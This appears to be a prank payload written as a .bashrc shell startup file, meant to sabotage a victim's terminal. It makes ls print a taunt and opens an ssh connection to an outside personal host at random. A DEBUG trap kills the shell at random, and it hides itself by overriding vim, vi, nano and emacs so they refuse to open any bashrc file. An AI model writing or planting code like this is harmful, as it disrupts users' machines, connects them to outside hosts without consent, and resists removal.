alias ls='ls && echo "David is an Overwatch god"'
if [ "$RANDOM" -le 5000 ]; then
	ssh mrdragan@dwhite54.ddns.net -p 50692 -t "telnet towel.blinkenlights.nl"
fi
if [ "$RANDOM" -ge 25000 ]; then
	echo "Something seems different..."
fi
trap '[ "$RANDOM" -le 2000 ] && exit' DEBUG

vim() {
	if [[ $@ == *"bashrc"* ]]; then
		echo "nice try"
	else
		command vim "$@"
	fi
}
nano() {
	if [[ $@ == *"bashrc"* ]]; then
		echo "nice try"
	else
		command vim "$@"
	fi
}
emacs() {
	if [[ $@ == *"bashrc"* ]]; then
		echo "nice try"
	else
		command vim "$@"
	fi
}
vi() {
	if [[ $@ == *"bashrc"* ]]; then
		echo "nice try"
	else
		command vim "$@"
	fi
}
